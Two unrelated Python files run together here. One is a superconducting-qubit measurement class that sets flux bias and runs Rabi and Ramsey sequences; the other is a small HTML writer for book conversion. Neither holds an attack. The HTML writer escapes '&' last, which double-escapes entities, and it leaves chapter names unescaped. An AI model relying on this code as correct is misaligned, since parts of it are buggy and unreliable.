from lib2.Measurement import Measurement from lib2.MeasurementResult import MeasurementResult from lib2.DispersiveRabiOscillations import DispersiveRabiOscillations from lib2.DispersiveRamsey import DispersiveRamsey from copy import deepcopy import csv import numpy as np from scipy.optimize import minimize from scipy.interpolate import interp1d from datetime import datetime as dt from importlib import reload from . import structures reload(structures) from .structures import Snapshot class DispersiveRabiFromFrequency(Measurement): ''' @brief: class is used to measure qubit lifetimes from the flux/qubit if_freq displacement from the sweet-spot. Measurement setup is the same as for the any other dispersive measurements. ''' def __init__(self, name, sample_name, ss_current_or_voltage, ss_freq, tts_result, lowest_ss=True, current_source=[None], q_z_awg=[None], plot_update_interval=5, **devs_aliases_map): ''' @params: name: string. sample_name: string. ss_current_or_voltage: float sweet spot DC bias or voltage depending on wether bias source or AWG is used to bias qubit flux ss_freq: float if_freq of the qubit in the sweet-spot of interest lowest_ss: bool sign of the second derivative of if_freq on flux shift variable if sign is positive, then this is a lower sweet-spot and lower_ss=True if sign is negative -> lower_ss = False dev_aliases_map: dict that contains following key:val pairs vna: alias address string or driver class vector network analyzer. q_lo: alias address string or driver class qubit if_freq generator for lo input of the mixer. ro_iqawg: IQAWG class instance AWG used to control readout pulse generation mixer q_iqawg: IQAWG class instance AWG used to control qubit excitation pulse generation mixer One of the following DC sources must be provided: current_source: alias address string or driver class bias source used to tune qubit if_freq q_z_awg: alias address string or driver class AWG generator that used to tune qubit if_freq plot_update_interval: float sleep milliseconds between plot updates ''' ## Equipment variables declaration section START ## self._current_source = None self._q_z_awg = None self._vna = None self._q_lo = None self._ro_awg = None self._q_awg = None ## Equipment variables declaration section END ## ## DEBUG self._fluxPts_iter_ctr = 0 # constructor initializes devices from kwargs.keys() with '_' appended # keys must coincide with the attributes introduced in # "equipment variables declaration section" # TODO: set_fixed_parmaeters in DRO class uses q_awg and ro_awg names instead of # more proper ro_iqawg and q_iqawg devs_aliases_map.update(current_source=current_source, q_z_awg=q_z_awg) super().__init__(name, sample_name, devs_aliases_map, plot_update_interval) ## initializing base class elements with child specific values ## self._measurement_result = RabiFromFrequencyResult(name, sample_name) # last successful two tone spectroscopy result # that contains sweet-spot in its area # as well as all the qubit frequencies that # are going to be measured in this class self._tts_result = tts_result self._snap = Snapshot(self._tts_result._data) # can be used to exctract curves in the future self._tts_curves = {} # list of functions that results from scipy.interp1d self._current_curve = None # bias tts curve that is chosen by self.set_tts_curve(curve_key) method ## Initial and bias freq(bias or voltage) point control START ## self._ss_freq = ss_freq self._ss_flux_var_value = ss_current_or_voltage self._lowest_ss = lowest_ss # True if bias is used, False if voltage source 
is used self._current_flag = None self._flux_var_setter = None self._flux_var = None # flux variable value now self._last_flux_var = None # last flux variable value # constructor arguments consistency test if( current_source is not None ): self._current_flag = True self._flux_var_setter = self._current_source[0].set_current elif( q_z_awg is not None ): self._current_flag = False self._flux_var_setter = self._q_z_awg[0].set_voltage else: print("RabiFromFreq: You must provide one and only one of the following \ constructor parameters:\n \ current_source or q_z_awg.") raise TypeError ## Initial and bias freq(bias or voltage) point control END ## # set_fixed_params args are stored here self._fixed_devices_params = {} # set_swept_params excitation_durations argument is stored here self._basic_excitation_durations = None # class that is responsible for rabi measurements self._DRO = DispersiveRabiOscillations(name, sample_name, **devs_aliases_map) # Rabi measurement class # class that is responsible for Ramsey measurements self._DR = DispersiveRamsey(name, sample_name, **devs_aliases_map) # Ramsey measurement class def load_curve_from_csv(self, filepath): """ TODO: add description """ with open(filepath, "r") as csv_file: rows = list(csv.reader(csv_file)) header = rows[0] curves_N = int(len(header) / 2) for curve_idx in range(curves_N): curve_name = header[2 * curve_idx] x = [] y = [] for i in range(0, len(rows) - 2): if (rows[i + 2][2 * curve_idx] != ""): x.append(rows[i + 2][2 * curve_idx]) y.append(rows[i + 2][2 * curve_idx + 1]) else: break # make sure there is no identical 'x' values x = np.array(x, dtype=np.float64) y = np.array(y, dtype=np.float64) unique_idcs = np.unique(x, return_index=True)[1] x = x[unique_idcs] y = y[unique_idcs] y_from_x_fit = interp1d(x, y, kind="cubic", copy=False, assume_sorted=False, fill_value="extrapolate") self._tts_curves[curve_name] = y_from_x_fit print("loaded tts_curves from file: " + filepath) print("curve labels: ", self._tts_curves.keys()) def select_tts_curve(self, curve_key): self._current_curve = self._tts_curves[curve_key] def set_fixed_parameters(self, rabi_sequence_parameters, detect_resonator=False, plot_resonator_fit=False, **devs_params): self._fixed_devices_params = devs_params self._DRO.set_fixed_parameters(rabi_sequence_parameters, detect_resonator=detect_resonator, plot_resonator_fit=plot_resonator_fit, **devs_params) def set_swept_parameters(self, rabi_excitation_durations, ss_shifts): ''' @params: excitation_durations - list of the rabi excitation pulse durations ss_shifts - list of absolute values of the qubit if_freq shift from sweet-spot ''' self._basic_excitation_durations = rabi_excitation_durations self._DRO.set_swept_parameters(rabi_excitation_durations) ramsey_delays = rabi_excitation_durations self._DR.set_swept_parameters(ramsey_delays) super().set_swept_parameters(ss_shifts=(self._ss_shift_setter, ss_shifts)) def set_ult_calib(self, ult_calib): # TODO: docstring self._DRO.set_ult_calib(ult_calib) self._DR.set_ult_calib(ult_calib) def _ss_shift_setter(self, ss_freq_shift): self._fluxPts_iter_ctr += 1 ''' @brief: sets new flux bias for a qubit to achieve qubit if_freq = ss_freq +- ss_freq_shift '+' or '-' is depending on the qubit freq(flux_bias) function behaviour around sweet_spot value ''' if( self._lowest_ss is True ): init_qubit_frequency = self._ss_freq + ss_freq_shift else: init_qubit_frequency = self._ss_freq - ss_freq_shift qubit_frequency = init_qubit_frequency # finding value of the new flux variable f = 
self._current_curve def f2min(x): return (f(x) - qubit_frequency)**2 # f(x) is returning if_freq value in Hz ig_x = None if( self._last_flux_var is None ): ig_x = self._ss_flux_var_value else: ig_x = self._last_flux_var res = minimize(f2min, ig_x, method="L-BFGS-B", bounds=((f.x[0], f.x[-1]),)) # setting new flux bias self._flux_var = res.x[0] self._flux_var_setter(self._flux_var) print("new flux variable: {}".format(self._flux_var), " mA") ## Adjusting if_freq to the present spot START ## ramsey_freq = 0 ramsey_shift = 5e6 ramsey_shift_error = 0.5e6 iteration_ctr = 0 # if there is no winner during the choice of the ramsey if_freq side, # than we change qubit if_freq by shift in this list n_trials = 5 fail_shift_list = [] for i in range(n_trials+1): m = i % 2 fail_shift_list.append((2*m-1) * ramsey_shift * (i / (n_trials - 1))) trial_ctr = 0 while( abs(ramsey_freq - ramsey_shift) > ramsey_shift_error ): # waiting for Ramsey to converge iteration_ctr += 1 print( "\npoint number {} iteration number {} trial number {}".format(self._fluxPts_iter_ctr, iteration_ctr, trial_ctr+1)) # gathering last successful device parameters dro_fixed_pars = self._DRO._fixed_pars pulse_seq_params = self._DRO._measurement_result.get_context().get_pulse_sequence_parameters() m = None if dro_fixed_pars["q_awg"][0]["calibration"]._sideband_to_maintain == "left": m = 1 elif dro_fixed_pars["q_awg"][0]["calibration"]._sideband_to_maintain == "right": m = -1 dro_fixed_pars["q_lo"][0]["if_freq"] = qubit_frequency + m * dro_fixed_pars["q_awg"][0]["calibration"]._if_frequency # finding Rabi pi/2 pulse self._DRO.set_fixed_parameters(pulse_seq_params, detect_resonator=True, plot_resonator_fit=False, **dro_fixed_pars) self._DRO.set_swept_parameters(self._basic_excitation_durations) self._rabi_oscillations_record() # updating Ramsey pulse sequence pi_pulse_duration = self._DRO._measurement_result.get_pi_pulse_duration()*1e3 basis = self._DRO._measurement_result.get_basis() ramsey_pulse_seq_params = deepcopy(pulse_seq_params) ramsey_pulse_seq_params.update(half_pi_pulse_duration=pi_pulse_duration / 2) # measuring Ramsey if_freq number 1 | (q_freq - ramsey_shift) apr_ramsey_freq1 = qubit_frequency - ramsey_shift dro_fixed_pars["q_lo"][0]["if_freq"] = apr_ramsey_freq1 + m * dro_fixed_pars["q_awg"][0]["calibration"]._if_frequency self._DR.set_fixed_parameters(ramsey_pulse_seq_params, detect_resonator=True, plot_resonator_fit=False, **dro_fixed_pars) self._DR.set_swept_parameters(self._basic_excitation_durations) # ramsey delays self._DR.set_basis(basis) self._ramsey_oscillations_record() ramsey_freq1 = self._DR._measurement_result.get_ramsey_frequency() fit_params1 = self._DR._measurement_result._fit_params data1 = self._DR._measurement_result._prepare_data_for_plot(self._DR._measurement_result.get_data()) # maybe I should calculate fit success index based on the relative residual per point residuals1 = self._DR._measurement_result._cost_function(fit_params1, *data1) print(ramsey_freq1) # measuring Ramsey if_freq number 2 | (q_freq + ramsey_shift) apr_ramsey_freq2 = qubit_frequency + ramsey_shift dro_fixed_pars["q_lo"][0]["if_freq"] = apr_ramsey_freq2 + m * dro_fixed_pars["q_awg"][0]["calibration"]._if_frequency self._DR.set_fixed_parameters(ramsey_pulse_seq_params, detect_resonator=True, plot_resonator_fit=False, **dro_fixed_pars) self._DR.set_swept_parameters(self._basic_excitation_durations) # ramsey delays self._DR.set_basis(basis) self._ramsey_oscillations_record() ramsey_freq2 = 
self._DR._measurement_result.get_ramsey_frequency() fit_params2 = self._DR._measurement_result._fit_params data2 = self._DR._measurement_result._prepare_data_for_plot(self._DR._measurement_result.get_data()) residuals2 = self._DR._measurement_result._cost_function(fit_params2, *data2) print(ramsey_freq2) if( (ramsey_freq2 + ramsey_freq1) > (2*ramsey_shift - ramsey_shift_error) and (ramsey_freq1 + ramsey_freq2) < (2*ramsey_shift + ramsey_shift_error) ): # if two frequencies are fitted normally and their sum is close # to the apriory computed value 2*ramsey_shift qubit_frequency = qubit_frequency + ramsey_shift - ramsey_freq2 ramsey_freq = ramsey_freq2 else: # one of the fit failed qubit_frequency = init_qubit_frequency + fail_shift_list[trial_ctr-1] trial_ctr += 1 print("New qubit if_freq: {}", qubit_frequency, flush=True) self._last_flux_var = self._flux_var print("new ss shift is setted") print("flux var value: {}\nqubit_frequency: {}".format(self._flux_var, qubit_frequency)) def _adjust_freq_with_TTS(self, flux_var, ro_power=None): """ @brief: Function measures single line of TTS in the 'flux_val' point around the bias chosen curve y(flux_var) point. The scan is performed with very weak readout freq to neglect ACSTark effect. Measured curve is then fitted and maximum corresponding to the qubit is exctracted. @params: flux_var : float Flux DC source output value ro_power : float (dBm) If provided, the readout is set to this value. If None -> using readout power settings that corresponds to ro_cal value for pulsed measurements. @return: new_qubit_frequency : float (Hz) number that represents the local maximum on the local TTS """ # TODO: consider implementing this function raise NotImplementedError def _recording_iteration(self): # _DRO will detect resonator and new qubit if_freq bias # during the call of the setters print("starting rabi\n") T_R, T_R_error = self._rabi_oscillations_record() print("starting ramsey\n") T_Ramsey, T_Ramsey_error = self._ramsey_oscillations_record() result = [T_R, T_R_error, T_Ramsey, T_Ramsey_error] return result # Pulse measurement decays is stored in self._raw_data def _rabi_oscillations_record(self): self._measurement_result._now_meas_type = "Rabi" # clearing previous fit results due to the fact, that VNATimeResolvedDispersiveMeasurement1D._fit_complex_curve(..) 
# when this fit_params are not None # almost every time tries to use this parameters as the new best initial guess # and due to the fact, that the next measurements is performed in entirely different flux point # this initial guess vector does not fit the parameter's fit bounds that are generated from # the data of the bias measurement self._DRO._measurement_result._fit_params = None self._DRO._measurement_result._fit_errors = None # this is due to the fact that first fit of the data # in DispersiveRabiOscillations is generating stupid bounds # for optimization methods, based on previous measurement data # so, this data has to be erased self._DRO._measurement_result.set_data({}) self._measurement_result._DRO_result = self._DRO._measurement_result self._DRO._measurement_result.set_start_datetime(dt.now()) if self._DRO._measurement_result.is_finished(): print("Starting with a result from a previous launch") self._DRO._measurement_result.set_is_finished(False) print("Started at: ", self._DRO._measurement_result.get_start_datetime()) self._DRO._record_data() self._DRO._measurement_result.fit(verbose=False) print("DRO._record_data finished") T_R = self._DRO._measurement_result._fit_params[2] # see DispersiveRabiOscillationsResult._model T_R_error = self._DRO._measurement_result._fit_errors[2] self._measurement_result._DRO_results.append(deepcopy(self._DRO._measurement_result)) return T_R, T_R_error def _ramsey_oscillations_record(self): self._measurement_result._now_meas_type = "Rabi" # clearing previous fit results due to the fact, that VNATimeResolvedDispersiveMeasurement1D._fit_complex_curve(..) # when this fit_params are not None # almost every time tries to use this parameters as the new best initial guess # and due to the fact, that the next measurements is performed in entirely different flux point # this initial guess vector does not fit the parameter's fit bounds that are generated from # the data of the bias measurement self._measurement_result._now_meas_type = "Ramsey" self._DR._measurement_result._fit_params = None self._DR._measurement_result._fit_errors = None # this is due to the fact that first fit of the data # in DispersiveRabiOscillations is generating stupid bounds # for optimization methods, based on previous measurement data # so, this data has to be erased # Ramsey oscillations data is erased just for sake of symmetry. # Actually there is no need to do this for DispersiveRamsey self._DR._measurement_result.set_data({}) self._measurement_result._DR_result = self._DR._measurement_result self._DR._measurement_result.set_start_datetime(dt.now()) if self._DR._measurement_result.is_finished(): print("Starting with a result from a previous launch") self._DR._measurement_result.set_is_finished(False) print("Started at: ", self._DR._measurement_result.get_start_datetime()) self._DR._record_data() self._DR._measurement_result.fit(verbose=False) print("DR._record_data finished") T_Ramsey, T_Ramsey_error = self._DR._measurement_result.get_ramsey_decay() self._measurement_result._DR_results.append(deepcopy(self._DR._measurement_result)) return T_Ramsey, T_Ramsey_error # TODO: NOT WORKING YET. Consider to implement working version or delete the following code ''' self._snap oonnected routines. 
    def plot_tts_connectivity_map(self, rel_threshold=0.5, kernel_x=0.1, kernel_y=0.1, connectivity=8):
        """
        @brief: This function ought to be called before self.launch()
                in order to perform visual control of the spectrum fitting
        """
        self._snap._connected_components()
        self._snap.visualize_connectivity_map()

    def set_connectivity_component_index(self, cc_index):
        """
        @brief: This function ought to be called before self.launch()
                in order to perform visual control of the spectrum fitting.
                It is called right after the call to self.plot_fft_connectivity_map(...)
        :param cc_index: integer index that was chosen manually by the operator
                         after examining the self.plot_fft_connectivity_map(...) output
        :return: interpolation function y(x) that is returned by scipy.interp1d(...)
        """
        self._snap._make_target_component_mask(label_i=cc_index)
        self._snap._interpolate_yx_curve()
        return self._snap._target_y_func

    def detect_tts_lines(self, kernel_x=0.1, kernel_y=0.1, rel_threshold=0.5, connectivity=8):
        # TODO: docstring
        self._snap.make_and_visualize_connectivity_map(rel_threshold=rel_threshold, kernel_x=kernel_x,
                                                       kernel_y=kernel_y, connectivity=connectivity)

    def select_tts_line(self, label_i):
        # TODO: docstring
        mask = self._snap.select_connectivity_component(label_i)
        self._snap.interpolate_yx_curve()
        return self._snap._target_y_func
    '''


class RabiFromFrequencyResult(MeasurementResult):
    def __init__(self, name, sample_name):
        super().__init__(name, sample_name)
        self._line_scatter = None
        self.ss_shifts = None
        # results of the last oscillation measurements are stored here
        self._DRO_result = None
        self._DR_result = None
        # parameter that shows what is being measured at this particular moment
        self._now_meas_type = None  # "Rabi" or "Ramsey"
        # self._DRO.launch().data will be stored in the following list
        self._DRO_results = []
        # self._DR.launch().data will be stored in the following list
        self._DR_results = []

    def _prepare_figure(self):
        import matplotlib.pyplot as plt
        fig, axes = plt.subplots(3, 1)
        axes = np.ravel(axes)
        return fig, axes, None

    def _prepare_data_for_plot(self, data):
        return data[self._parameter_names[0]], data["data"][:, 0]

    def _plot(self, data):
        '''
        caxes is None
        '''
        import time
        if( "data" in data.keys() ):
            # print(data)
            # time.sleep(2)
            x, y_data = self._prepare_data_for_plot(data)
            xlim = np.array([x[0], x[-1]])/1e6  # convert to MHz
            # crop data that is still to be measured
            y_data = y_data[y_data != 0]
            x = x[:len(y_data)]

            # redrawing axes data
            ax = self._axes[0]
            ax.clear()  # matplotlib Axes has no reset(); clear() redraws from scratch
            ax.set_xlabel(r"$\delta \nu$, MHz")
            ax.set_ylabel(r"$T_R, \; \mu s$")
            ax.grid()
            self._line_scatter, = ax.plot(x/1e6, y_data, 'r', marker="o", markerfacecolor='none')
            # setting x limit for graph
            ax.set_xlim(xlim[0], xlim[1])

            ## plot rabi result
            if( (self._DRO_result is not None) and (self._now_meas_type == "Rabi") ):
                # there is no hook on the plotting thread that is called when we move from one point to another
                self._DRO_result._axes = self._axes[1:3]
                self._DRO_result._figure = self._figure
                DRO_data = self._DRO_result.get_data()
                # prepare the current DRO_data
                # TODO: hotfix by Shamil
                # 'DispersiveRabiOscillationsResult' object has no attribute '_dynamic'
                # when dynamic==True the code in VNATRDM1D skips replotting the data;
                # this conflicts with a previously drawn picture, e.g. from "Ramsey"
                # when False it replots the whole curve
                setattr(self._DRO_result, "_dynamic", False)
                self._DRO_result._plot(DRO_data)
            elif( (self._DR_result is not None) and (self._now_meas_type == "Ramsey") ):
                # there is no hook on the plotting thread that is called when we move from one point to another
                self._DR_result._axes = self._axes[1:3]
                self._DR_result._figure = self._figure
                DR_data = self._DR_result.get_data()
                # prepare the current DR_data
                # TODO: hotfix by Shamil
                # 'DispersiveRabiOscillationsResult' object has no attribute '_dynamic'
                # when dynamic==True the code in VNATRDM1D skips replotting the data;
                # this conflicts with a previously drawn picture, e.g. from "Rabi"
                # when False it replots the whole curve
                setattr(self._DR_result, "_dynamic", False)
                self._DR_result._plot(DR_data)
""" Simple HTML output. Useful for checking the conversion. """ from .output import OutputFile from .. import text import os class HtmlOutput(OutputFile): def __init__(self, outfile, outdir=None): OutputFile.__init__(self) self.__metadata = None self.__outfile = outfile self.__outdir = outdir self.__chapter_titles = [] self.__title_stuff = [] self.__chapters = [] def add_section(self, section): if isinstance(section, text.Chapter): self.__chapter_titles.append(section.name) self.__chapters.append(section) elif len(self.__chapters) <= 0: self.__title_stuff.append(section) else: raise Exception("Only top-level chapters are allowed") def set_metadata(self, metadata): assert isinstance(metadata, text.MetaData) self.__metadata = metadata def write(self): with open(self.__outfile, "w") as out: if self.__metadata is not None: write_metadata(self.__metadata, out) else: write_generic_header(out) for sec in self.__title_stuff: write_part(sec, out) write_toc(self.__chapter_titles, out) for sec in self.__chapters: write_chapter(sec, out, self.__outdir) write_footer(out) def preview(self): pass def add_toc(self, toc): pass def write_metadata(metadata, out): assert isinstance(metadata, text.MetaData) # Ignore cover image out.writelines("""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>{title}</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> </head> <body> <h1>{title}</h1> <h2>By {author_first} {author_last}</h2> <h2>{description}</h2> <h3>&copy; {year} {isbn_10} / {isbn_13}</h3> """.format(**metadata.as_dict())) def write_generic_header(out): out.writelines("""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>A Book</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> </head> <body> <h1>A Book</h1> """) def write_toc(titles, out): out.write(" <h4>Table of Contents</h4>\n <ol>\n") for name in titles: out.write(" <li><a href='#{0}'>{0}</a></li>\n".format(name)) out.write(" </ol>\n") def write_chapter(sec, out, outdir): assert isinstance(sec, text.Chapter) out.write(" <h4><a name='{0}'>{0}</a></h4>\n".format(sec.name)) for part in sec.get_children(): write_part(part, out, outdir) def write_part(sec, out, outdir, pref=">"): if isinstance(sec, text.Image): print(pref+" image") if outdir is not None: fname = os.path.join(outdir, sec.filename) dirname = os.path.split(fname)[0] if not os.path.isdir(dirname): os.makedirs(dirname) with open(fname, "wb") as f: sec.save_as(f) out.write(" <img src='{0}'>\n".format(sec.filename)) elif isinstance(sec, text.Para): print(pref+" para") out.write(" <p>") for span in sec.get_children(): write_part(span, out, outdir, pref+">") out.write("</p>\n") elif isinstance(sec, text.Text): # italics and so on x = sec.text if isinstance(sec, text.SpecialCharacter): x = sec.html else: x = x.replace("<","&lt;").replace(">","&gt;").replace("&","&amp;") print(pref+" text[{0}]".format(x)) out.write("<span>{0}</span>".format(x)) elif isinstance(sec, text.SeparatorLine): out.write(" <center>* * *</center>\n") elif isinstance(sec, text.Correction): # ignore print("Correction: was originally [{0}]".format(sec.original)) pass else: raise Exception("unknown part {0}".format(sec)) def write_footer(out): out.writelines(""" </body> </html> """)